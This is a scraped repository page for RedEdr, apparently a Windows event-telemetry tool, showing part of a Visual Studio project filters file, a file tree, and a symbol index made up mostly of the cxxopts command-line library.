      <UniqueIdentifier>{e6905749-0e08-4e18-a4f4-4f769d79fd46}</UniqueIdentifier>
    </Filter>
    <Filter Include="Header Files\libs">
      <UniqueIdentifier>{b5b02dc7-53a6-4d22-bfa6-a4102b950d4c}</UniqueIdentifier>
    </Filter>
    <Filter Include="Header Files\process">
      <UniqueIdentifier>{f0d7fa81-5b59-4e94-a796-11bd411a1184}</UniqueIdentifier>
    </Filter>
    <Filter Include="Header Files\windows">
      <UniqueIdentifier>{f74d6ae9-c05b-493d-9ee1-76ea79ba0703}</UniqueIdentifier>
    </Filter>
    <Filter Include="Source Files\windows">
      <UniqueIdentifier>{df7f6388-9e99-46c4-89bf-2a931b922311}</UniqueIdentifier>
    </Filter>
    <Filter Include="Source Files\existing">
      <UniqueIdentifier>{aac45432-501a-4c40-8440-16c4e8725eb9}</UniqueIdentifier>
    </Filter>
  </ItemGroup>
  <ItemGroup>
    <ClCompile Include="RedEdr.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="config.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="serviceutils.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="webserver.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="etwreader.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="dllreader.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="kernelreader.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="kernelinterface.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="pplmanager.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="pplreader.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="logreader.cpp">
      <Filter>Source Files\input</Filter>
    </ClCompile>
    <ClCompile Include="manager.cpp">
      <Filter>Source Files</Filter>
    </ClCompile>
    <ClCompile Include="dllinjector.cpp">
      <Filter>Source Files\windows</Filter>
    </ClCompile>
    <ClCompile Include="event_aggregator.cpp">
      <Filter>Source Files\process</Filter>
    </ClCompile>
    <ClCompile Include="event_processor.cpp">
      <Filter>Source Files\process</Filter>
    </ClCompile>
    <ClCompile Include="event_augmenter.cpp">
      <Filter>Source Files\process</Filter>
    </ClCompile>
    <ClCompile Include="..\RedEdrShared\etw_krabs.cpp">
      <Filter>Source Files\existing</Filter>
    </ClCompile>
    <ClCompile Include="..\RedEdrShared\process_query.cpp">
      <Filter>Source Files\existing</Filter>
    </ClCompile>
    <ClCompile Include="pri

Download .txt

gitextract_ihdwzsgx/

├── .gitattributes
├── .gitignore
├── CLAUDE.md
├── Data/
│   ├── dostuff.events.json
│   └── generator.txt
├── Doc/
│   ├── api.md
│   └── notes.md
├── LICENSE.txt
├── README.md
├── RedEdr/
│   ├── RedEdr.cpp
│   ├── RedEdr.vcxproj
│   ├── RedEdr.vcxproj.filters
│   ├── config.cpp
│   ├── config.h
│   ├── cxxops.hpp
│   ├── design.css
│   ├── dllinjector.cpp
│   ├── dllinjector.h
│   ├── dllreader.cpp
│   ├── dllreader.h
│   ├── etwreader.cpp
│   ├── etwreader.h
│   ├── event_aggregator.cpp
│   ├── event_aggregator.h
│   ├── event_augmenter.cpp
│   ├── event_augmenter.h
│   ├── event_processor.cpp
│   ├── event_processor.h
│   ├── httplib.h
│   ├── index.html
│   ├── jsonw.hpp
│   ├── kernelinterface.cpp
│   ├── kernelinterface.h
│   ├── kernelreader.cpp
│   ├── kernelreader.h
│   ├── logging.cpp
│   ├── logging.h
│   ├── logreader.cpp
│   ├── logreader.h
│   ├── manager.cpp
│   ├── manager.h
│   ├── packages.config
│   ├── pplmanager.cpp
│   ├── pplmanager.h
│   ├── pplreader.cpp
│   ├── pplreader.h
│   ├── privileges.cpp
│   ├── privileges.h
│   ├── serviceutils.cpp
│   ├── serviceutils.h
│   ├── shared.js
│   ├── webserver.cpp
│   └── webserver.h
├── RedEdr.sln
├── RedEdrDll/
│   ├── RedEdrDll.filters
│   ├── RedEdrDll.vcxproj
│   ├── RedEdrDll.vcxproj.filters
│   ├── detours.h
│   ├── detours.lib
│   ├── dllhelper.cpp
│   ├── dllhelper.h
│   ├── dllmain.cpp
│   ├── framework.h
│   ├── logging.cpp
│   └── logging.h
├── RedEdrDriver/
│   ├── Driver.c
│   ├── MyDumbEDRDriver.inf
│   ├── RedEdrDriver.inf
│   ├── RedEdrDriver.vcxproj
│   ├── RedEdrDriver.vcxproj.filters
│   ├── hashcache.c
│   ├── hashcache.h
│   ├── kapcinjector.c
│   ├── kapcinjector.h
│   ├── kcallbacks.c
│   ├── kcallbacks.h
│   ├── settings.c
│   ├── settings.h
│   ├── upipe.c
│   ├── upipe.h
│   ├── utils.c
│   └── utils.h
├── RedEdrPplService/
│   ├── README.md
│   ├── RedEdrPplService.cpp
│   ├── RedEdrPplService.vcxproj
│   ├── RedEdrPplService.vcxproj.filters
│   ├── control.cpp
│   ├── control.h
│   ├── emitter.cpp
│   ├── emitter.h
│   ├── etwtihandler.cpp
│   ├── etwtihandler.h
│   ├── etwtireader.cpp
│   ├── etwtireader.h
│   ├── logging.cpp
│   ├── logging.h
│   ├── packages.config
│   └── uthash.h
├── RedEdrShared/
│   ├── RedEdrShared.vcxproj
│   ├── RedEdrShared.vcxproj.filters
│   ├── etw_krabs.cpp
│   ├── etw_krabs.h
│   ├── json.hpp
│   ├── loguru.cpp
│   ├── loguru.hpp
│   ├── mypeb.h
│   ├── myprocess.cpp
│   ├── myprocess.h
│   ├── packages.config
│   ├── piping.cpp
│   ├── piping.h
│   ├── process_mem_static.cpp
│   ├── process_mem_static.h
│   ├── process_query.cpp
│   ├── process_query.h
│   ├── process_resolver.cpp
│   ├── process_resolver.h
│   ├── ranges.cpp
│   ├── ranges.h
│   ├── utils.cpp
│   └── utils.h
├── RedEdrTester/
│   ├── RedEdrTester.cpp
│   ├── RedEdrTester.vcxproj
│   ├── RedEdrTester.vcxproj.filters
│   └── packages.config
├── Shared/
│   └── common.h
├── UnitTests/
│   ├── UnitTestAnalyzer.cpp
│   ├── UnitTestEventProducer.cpp
│   ├── UnitTestProcessInfo.cpp
│   ├── UnitTestRanges.cpp
│   ├── UnitTests.cpp
│   ├── UnitTests.vcxproj
│   ├── UnitTests.vcxproj.filters
│   ├── logging.cpp
│   ├── logging.h
│   └── notepad.json
├── azure_config.json.sample
├── azure_upload.ps1
├── elam_driver/
│   ├── elam_driver.c
│   ├── elam_driver.rc
│   ├── elam_driver.vcxproj
│   └── elam_driver.vcxproj.Filters
├── generate_cert.ps1
├── rededr_ppl.pfx
├── rededr_test.ps1
└── sign_file.ps1

Download .txt

SYMBOL INDEX (1246 symbols across 71 files)

FILE: RedEdr/RedEdr.cpp
  function BOOL (line 29) | BOOL WINAPI ConsoleCtrlHandler(DWORD ctrlType) {
  function CreateRequiredFiles (line 45) | void CreateRequiredFiles() {
  function main (line 57) | int main(int argc, char* argv[]) {

FILE: RedEdr/config.h
  function class (line 7) | class Config {

FILE: RedEdr/cxxops.hpp
  type cxxopts (line 121) | namespace cxxopts {
    function String (line 144) | inline
    class UnicodeStringIterator (line 156) | class UnicodeStringIterator
      method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
      method value_type (line 172) | value_type
      method UnicodeStringIterator (line 190) | UnicodeStringIterator&
      method UnicodeStringIterator (line 197) | UnicodeStringIterator
    function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
    function String (line 216) | inline
    function String (line 229) | String&
    function stringLength (line 241) | inline
    function toUTF8String (line 248) | inline
    function empty (line 258) | inline
    function T (line 293) | T
    function stringLength (line 299) | inline
    function String (line 306) | inline
    function String (line 313) | inline
    function String (line 321) | String&
    function toUTF8String (line 328) | std::string
    function empty (line 334) | inline
    class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
    function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
    function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
    type values (line 585) | namespace values {
      type parser_tool (line 587) | namespace parser_tool {
        type IntegerDesc (line 589) | struct IntegerDesc
        type ArguDesc (line 595) | struct ArguDesc {
        function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
        function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
      type detail (line 877) | namespace detail {
        type SignedCheck (line 880) | struct SignedCheck
        type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
        type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
        function check_signed_range (line 915) | void
      function checked_negate (line 924) | void
      function checked_negate (line 934) | void
      function integer_parser (line 941) | void
      function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
      function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
      function parse_value (line 1028) | inline
      function parse_value (line 1047) | inline
      function parse_value (line 1060) | void
      function parse_value (line 1067) | void
      function parse_value (line 1076) | inline
      function parse_value (line 1088) | void
      function add_value (line 1107) | void
      function add_value (line 1114) | void
      type type_is_container (line 1123) | struct type_is_container
      type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
      class abstract_value (line 1135) | class abstract_value : public Value
        method abstract_value (line 1140) | abstract_value()
        method abstract_value (line 1146) | explicit abstract_value(T* t)
        method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
        method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
        method add (line 1173) | void
        method parse (line 1179) | void
        method is_container (line 1185) | bool
        method parse (line 1191) | void
        method has_default (line 1197) | bool
        method has_implicit (line 1203) | bool
        method default_value (line 1209) | std::shared_ptr<Value>
        method implicit_value (line 1217) | std::shared_ptr<Value>
        method no_implicit_value (line 1225) | std::shared_ptr<Value>
        method get_default_value (line 1232) | std::string
        method get_implicit_value (line 1238) | std::string
        method is_boolean (line 1244) | bool
        method T (line 1250) | const T&
      class standard_value (line 1272) | class standard_value : public abstract_value<T>
        method override (line 1279) | const override
      class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
        method standard_value (line 1291) | standard_value()
        method standard_value (line 1296) | explicit standard_value(bool* b)
        method clone (line 1303) | std::shared_ptr<Value>
        method set_default_and_implicit (line 1311) | void
    function value (line 1324) | std::shared_ptr<Value>
    function value (line 1331) | std::shared_ptr<Value>
    class OptionAdder (line 1337) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
    class OptionDetails (line 1348) | class OptionDetails
      method OptionDetails (line 1351) | OptionDetails
      method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
      method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
      method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
      method hash (line 1424) | std::size_t
    type HelpOptionDetails (line 1440) | struct HelpOptionDetails
    type HelpGroupDetails (line 1454) | struct HelpGroupDetails
    class OptionValue (line 1461) | class OptionValue
      method add (line 1464) | void
      method parse (line 1477) | void
      method parse_default (line 1490) | void
      method parse_no_value (line 1499) | void
      method noexcept (line 1512) | const noexcept
      method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
      method T (line 1530) | const T&
      method as_optional (line 1543) | std::optional<T>
      method ensure_value (line 1554) | void
    class KeyValue (line 1572) | class KeyValue
      method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
      method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
      method T (line 1596) | T
    class ParseResult (line 1612) | class ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    type Option (line 1824) | struct Option
      method Option (line 1826) | Option
    class OptionParser (line 1850) | class OptionParser
      method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
    class Options (line 1908) | class Options
      method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
      method Options (line 1925) | Options&
      method Options (line 1932) | Options&
      method Options (line 1939) | Options&
      method Options (line 1946) | Options&
      method Options (line 1953) | Options&
      method Options (line 1960) | Options&
      method add_option (line 1998) | void
      method parse_positional (line 2025) | void
    class OptionAdder (line 2084) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function String (line 2112) | String
    function String (line 2158) | String
    function OptionAdder (line 2303) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function OptionAdder (line 2310) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function ParseResult (line 2487) | inline
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function ParseResult (line 2496) | inline ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    function String (line 2751) | inline
    function HelpGroupDetails (line 2899) | inline
  type cxxopts (line 140) | namespace cxxopts {
    function String (line 144) | inline
    class UnicodeStringIterator (line 156) | class UnicodeStringIterator
      method UnicodeStringIterator (line 166) | UnicodeStringIterator(const icu::UnicodeString* string, int32_t pos)
      method value_type (line 172) | value_type
      method UnicodeStringIterator (line 190) | UnicodeStringIterator&
      method UnicodeStringIterator (line 197) | UnicodeStringIterator
    function CXXOPTS_DIAGNOSTIC_POP (line 207) | CXXOPTS_DIAGNOSTIC_POP
    function String (line 216) | inline
    function String (line 229) | String&
    function stringLength (line 241) | inline
    function toUTF8String (line 248) | inline
    function empty (line 258) | inline
    function T (line 293) | T
    function stringLength (line 299) | inline
    function String (line 306) | inline
    function String (line 313) | inline
    function String (line 321) | String&
    function toUTF8String (line 328) | std::string
    function empty (line 334) | inline
    class Value (line 362) | class Value : public std::enable_shared_from_this<Value>
    function CXXOPTS_DIAGNOSTIC_POP (line 409) | CXXOPTS_DIAGNOSTIC_POP
    function throw_or_mimic (line 565) | void throw_or_mimic(const std::string& text)
    type values (line 585) | namespace values {
      type parser_tool (line 587) | namespace parser_tool {
        type IntegerDesc (line 589) | struct IntegerDesc
        type ArguDesc (line 595) | struct ArguDesc {
        function IntegerDesc (line 603) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 632) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 650) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 668) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 714) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
        function IntegerDesc (line 787) | inline IntegerDesc SplitInteger(const std::string& text)
        function IsTrueText (line 814) | inline bool IsTrueText(const std::string& text)
        function IsFalseText (line 822) | inline bool IsFalseText(const std::string& text)
        function OptionNames (line 833) | inline OptionNames split_option_names(const std::string& text)
        function ArguDesc (line 851) | inline ArguDesc ParseArgument(const char* arg, bool& matched)
      type detail (line 877) | namespace detail {
        type SignedCheck (line 880) | struct SignedCheck
        type SignedCheck<T, true> (line 883) | struct SignedCheck<T, true>
        type SignedCheck<T, false> (line 907) | struct SignedCheck<T, false>
        function check_signed_range (line 915) | void
      function checked_negate (line 924) | void
      function checked_negate (line 934) | void
      function integer_parser (line 941) | void
      function stringstream_parser (line 1011) | void stringstream_parser(const std::string& text, T& value)
      function parse_value (line 1023) | void parse_value(const std::string& text, T& value)
      function parse_value (line 1028) | inline
      function parse_value (line 1047) | inline
      function parse_value (line 1060) | void
      function parse_value (line 1067) | void
      function parse_value (line 1076) | inline
      function parse_value (line 1088) | void
      function add_value (line 1107) | void
      function add_value (line 1114) | void
      type type_is_container (line 1123) | struct type_is_container
      type type_is_container<std::vector<T>> (line 1129) | struct type_is_container<std::vector<T>>
      class abstract_value (line 1135) | class abstract_value : public Value
        method abstract_value (line 1140) | abstract_value()
        method abstract_value (line 1146) | explicit abstract_value(T* t)
        method abstract_value (line 1153) | abstract_value& operator=(const abstract_value&) = default;
        method abstract_value (line 1155) | abstract_value(const abstract_value& rhs)
        method add (line 1173) | void
        method parse (line 1179) | void
        method is_container (line 1185) | bool
        method parse (line 1191) | void
        method has_default (line 1197) | bool
        method has_implicit (line 1203) | bool
        method default_value (line 1209) | std::shared_ptr<Value>
        method implicit_value (line 1217) | std::shared_ptr<Value>
        method no_implicit_value (line 1225) | std::shared_ptr<Value>
        method get_default_value (line 1232) | std::string
        method get_implicit_value (line 1238) | std::string
        method is_boolean (line 1244) | bool
        method T (line 1250) | const T&
      class standard_value (line 1272) | class standard_value : public abstract_value<T>
        method override (line 1279) | const override
      class standard_value<bool> (line 1286) | class standard_value<bool> : public abstract_value<bool>
        method standard_value (line 1291) | standard_value()
        method standard_value (line 1296) | explicit standard_value(bool* b)
        method clone (line 1303) | std::shared_ptr<Value>
        method set_default_and_implicit (line 1311) | void
    function value (line 1324) | std::shared_ptr<Value>
    function value (line 1331) | std::shared_ptr<Value>
    class OptionAdder (line 1337) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function CXXOPTS_NODISCARD (line 1339) | CXXOPTS_NODISCARD
    class OptionDetails (line 1348) | class OptionDetails
      method OptionDetails (line 1351) | OptionDetails
      method OptionDetails (line 1367) | OptionDetails(const OptionDetails& rhs)
      method OptionDetails (line 1374) | OptionDetails(OptionDetails&& rhs) = default;
      method CXXOPTS_NODISCARD (line 1376) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1383) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1389) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1396) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1403) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1410) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1417) | CXXOPTS_NODISCARD
      method hash (line 1424) | std::size_t
    type HelpOptionDetails (line 1440) | struct HelpOptionDetails
    type HelpGroupDetails (line 1454) | struct HelpGroupDetails
    class OptionValue (line 1461) | class OptionValue
      method add (line 1464) | void
      method parse (line 1477) | void
      method parse_default (line 1490) | void
      method parse_no_value (line 1499) | void
      method noexcept (line 1512) | const noexcept
      method CXXOPTS_NODISCARD (line 1522) | CXXOPTS_NODISCARD
      method T (line 1530) | const T&
      method as_optional (line 1543) | std::optional<T>
      method ensure_value (line 1554) | void
    class KeyValue (line 1572) | class KeyValue
      method KeyValue (line 1575) | KeyValue(std::string key_, std::string value_) noexcept
      method CXXOPTS_NODISCARD (line 1581) | CXXOPTS_NODISCARD
      method CXXOPTS_NODISCARD (line 1588) | CXXOPTS_NODISCARD
      method T (line 1596) | T
    class ParseResult (line 1612) | class ParseResult
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method count (line 1726) | std::size_t
      method OptionValue (line 1745) | const OptionValue&
      method as_optional (line 1767) | std::optional<T>
      method arguments_string (line 1801) | const std::string
    type Option (line 1824) | struct Option
      method Option (line 1826) | Option
    class OptionParser (line 1850) | class OptionParser
      method OptionParser (line 1853) | OptionParser(const OptionMap& options, const PositionalList& positio...
    class Options (line 1908) | class Options
      method Options (line 1912) | explicit Options(std::string program_name, std::string help_string =...
      method Options (line 1925) | Options&
      method Options (line 1932) | Options&
      method Options (line 1939) | Options&
      method Options (line 1946) | Options&
      method Options (line 1953) | Options&
      method Options (line 1960) | Options&
      method add_option (line 1998) | void
      method parse_positional (line 2025) | void
    class OptionAdder (line 2084) | class OptionAdder
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function String (line 2112) | String
    function String (line 2158) | String
    function OptionAdder (line 2303) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function OptionAdder (line 2310) | inline
      method OptionAdder (line 2088) | OptionAdder(Options& options, std::string group)
    function ParseResult (line 2487) | inline
      class Iterator (line 1615) | class Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method ParseResult (line 1698) | ParseResult() = default;
      method ParseResult (line 1699) | ParseResult(const ParseResult&) = default;
      method ParseResult (line 1701) | ParseResult(NameHashMap&& keys, ParsedHashMap&& values, std::vector<...
      method ParseResult (line 1711) | ParseResult& operator=(ParseResult&&) = default;
      method ParseResult (line 1712) | ParseResult& operator=(const ParseResult&) = default;
      method Iterator (line 1714) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
        method KeyValue (line 1682) | const KeyValue& operator*()
        method KeyValue (line 1687) | const KeyValue* operator->()
      method Iterator (line 1720) | Iterator
        method Iterator (line 1624) | Iterator() = default;
        method Iterator (line 1625) | Iterator(const Iterator&) = default;
        method Iterator (line 1631) | Iterator(const ParseResult* pr, bool end = false)
        method CXXOPTS_DIAGNOSTIC_POP (line 1651) | CXXOPTS_DIAGNOSTIC_POP
        method Iterator (line 1665) | Iterator operator++(int)
